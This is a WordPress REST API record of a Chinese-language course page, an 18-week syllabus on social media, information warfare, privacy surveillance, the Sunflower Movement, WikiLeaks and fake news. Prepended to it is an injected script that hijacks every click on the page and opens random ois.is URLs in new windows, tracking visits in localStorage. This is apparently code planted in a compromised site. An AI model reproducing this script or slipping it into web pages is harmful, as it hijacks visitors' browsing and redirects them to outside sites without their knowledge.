<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1465,"date":"2020-02-26T14:19:26","date_gmt":"2020-02-26T06:19:26","guid":{"rendered":"http:\/\/edu.secda.info\/chewei_course8\/?page_id=1465"},"modified":"2021-09-13T11:37:03","modified_gmt":"2021-09-13T03:37:03","slug":"%e5%ad%b8%e7%bf%92%e9%80%b2%e5%ba%a6","status":"publish","type":"page","link":"https:\/\/edu.secda.info\/chewei_course8\/?page_id=1465","title":{"rendered":"\u5b78\u7fd2\u9032\u5ea6"},"content":{"rendered":"<table style=\"height: 1622px;\">\n<tbody>\n<tr>\n<td style=\"text-align: center;\" rowspan=\"3\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>\u9031\u6b21<\/strong><\/span><\/td>\n<td style=\"text-align: center;\" rowspan=\"3\" width=\"267\"><span style=\"font-size: 12pt;\"><strong>\u6388\u8ab2\u5167\u5bb9<\/strong><\/span><\/td>\n<td colspan=\"3\" width=\"186\">\n<p style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>\u6388\u8ab2\u65b9\u5f0f\u53ca\u6642\u6578<\/strong><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>(\u8acb\u586b\u6642\u6578\uff0c\u7121\u5247\u514d\u586b)<\/strong><\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" rowspan=\"2\" width=\"57\"><span style=\"font-size: 12pt;\"><strong>\u9762\u6388<\/strong><\/span><\/td>\n<td style=\"text-align: center;\" colspan=\"2\" width=\"129\"><span style=\"font-size: 12pt;\"><strong>\u9060\u8ddd\u6559\u5b78<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\"><strong>\u975e\u540c\u6b65<\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\"><strong>\u540c\u6b65<\/strong><\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>1<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><a href=\"https:\/\/gmntupesedutw-my.sharepoint.com\/:v:\/g\/personal\/chewei_gm_ntupes_edu_tw\/Edhzl3i4G6dDk4WhnLGnvUMBReXtg49wEcGnQKdz0GEjiA?e=zMuf7i\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #000080;\"><strong>\u793e\u7fa4\u5a92\u9ad4\u8a66\u8b80\u8ab2\u7a0b\u89e3\u8aaa<\/strong><\/span><\/a><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>2<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u7121\u8272\u89ba\u9192<\/span><\/strong><\/span><\/p>\n<p><span style=\"font-size: 12pt;\"><span style=\"color: #000080;\"><strong>\u8cc7\u8a0a\u6230\u7b56\u7565<\/strong><\/span><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>3<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u81fa\u7063\u516c\u6c11\u79d1\u6280\u7684\u89ba\u9192<\/span><\/strong><\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b(1):\u7af9\u5317\u4e8b\u4ef6<\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b(2):\u54e1\u8b66\u7528\u8173\u8e39\u982d\u58d3\u5236\u7121\u7167\u5c11\u5e74<\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b(3):\u70ba\u4ec0\u9ebc\u8b66\u5bdf\u4e5f\u8981\u4f9d\u6cd5\u884c\u653f\u5462\uff1f<\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>4<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><span style=\"color: #000080;\"><strong>\u82b1\u84ee\u89aa\u5b50\u666f\u9ede\u53f0\u958b\u5fc3\u8fb2\u5834<\/strong><\/span><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>5<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><span style=\"color: #000080;\"><strong>\u793e\u7fa4\u5a92\u9ad4\u4f5c\u70ba\u4e00\u7a2e\u53c3\u8207\u5f0f\u6587\u5316(\u4e00)<\/strong><\/span><\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b:\u53f0\u7063\u9ec3\u80cc\u5fc3\u904b\u52d5 \u53cd\u6cd5\u7a05\u5a01\u6b0a \u53f8\u6cd5\u771f\u6539\u9769<\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>6<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u793e\u7fa4\u5a92\u9ad4\u4f5c\u70ba\u4e00\u7a2e\u53c3\u8207\u5f0f\u6587\u5316(\u4e8c)<\/span><\/strong><\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b(1):\u9ec3\u80cc\u5fc3\u4e4b\u4e82!\u53f0\u7063\u53ef\u80fd\u4e0a\u6f14!<\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b(2):\u6d2a\u4ef2\u4e18\u4e8b\u4ef6<\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>7<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u793e\u7fa4\u5a92\u9ad4\u8207\u50b3\u64ad\u529b<\/span><\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>8<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u793e\u7fa4\u5a92\u9ad4\u7684\u6b0a\u529b\u8207\u653f\u6cbb\u7d93\u6fdf<\/span><\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>9<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #ff0000;\">\u671f\u4e2d\u8003\u9031<\/span><\/strong><\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u9762\u5c0d\u6578\u4f4d\u6d6a\u6f6e-\u5047\u65b0\u805e<\/span><\/td>\n<td width=\"57\"><\/td>\n<td style=\"text-align: center;\" width=\"66\"><\/td>\n<td width=\"63\"><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>10<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u5982\u4f55\u64b0\u5beb\u6210\u529f\u65b0\u805e\u7a3f(1)<\/span><\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>11<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><span style=\"color: #000080;\"><strong>\u5982\u4f55\u64b0\u5beb\u6210\u529f\u65b0\u805e\u7a3f(2)<\/strong><\/span><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>12<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">google\u641c\u5c0b\u5f15\u64ce<\/span><\/strong><\/span><\/p>\n<p><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\"><span style=\"color: #0000ff;\"><span style=\"color: #000080;\">google\u641c\u5c0b\u5f15\u64ce<\/span><\/span>\u597d\u8207\u58de<\/span><\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>13<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u81c9\u66f8\u5c0d\u96b1\u79c1\u6b0a\u7684\u76e3\u63a7(\u4e00)<\/span><\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>14<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u81c9\u66f8\u5c0d\u96b1\u79c1\u6b0a\u7684\u76e3\u63a7(\u4e8c)<\/span><\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>15<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><span style=\"color: #000080;\"><strong>\u63a8\u7279\u8207\u6c11\u4e3b(\u4e00)<\/strong><\/span><\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b:\u592a\u967d\u82b1\u904b\u52d5\u7d00\u9304\u7247<\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>16<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #000080;\">\u63a8\u7279\u8207\u6c11\u4e3b(\u4e8c)<\/span><\/strong><\/span><\/p>\n<p><span style=\"font-size: 12pt;\">\u6848\u4f8b:\u201c\u592a\u967d\u82b1\u201d\u5b78\u904b\u5c0d\u81fa\u7063\u7684\u50b7\u5bb3\u6709\u591a\u6df1\uff1f<\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>17<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><span style=\"color: #ff0000;\"><strong><span style=\"color: #000080;\">\u7dad\u57fa\u89e3\u5bc6-\u6211\u5011\u80fd\u8b93\u6b0a\u529b\u8b8a\u900f\u660e\uff1f<\/span><\/strong><\/span><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\" width=\"31\"><span style=\"font-size: 12pt;\"><strong>18<\/strong><\/span><\/td>\n<td width=\"267\"><span style=\"font-size: 12pt;\"><strong><span style=\"color: #ff0000;\">\u671f\u672b\u8003\u9031<\/span><\/strong><\/span><\/td>\n<td style=\"text-align: center;\" width=\"57\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"66\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<td style=\"text-align: center;\" width=\"63\"><span style=\"font-size: 12pt;\">V<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>\u9031\u6b21 \u6388\u8ab2\u5167\u5bb9 \u6388\u8ab2\u65b9\u5f0f\u53ca\u6642\u6578 (\u8acb\u586b\u6642\u6578\uff0c\u7121\u5247\u514d\u586b) \u9762\u6388 \u9060\u8ddd\u6559\u5b78 \u975e\u540c\u6b65 <\/p>\n","protected":false},"author":6,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0},"_links":{"self":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages\/1465"}],"collection":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1465"}],"version-history":[{"count":27,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages\/1465\/revisions"}],"predecessor-version":[{"id":1741,"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=\/wp\/v2\/pages\/1465\/revisions\/1741"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/chewei_course8\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1465"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}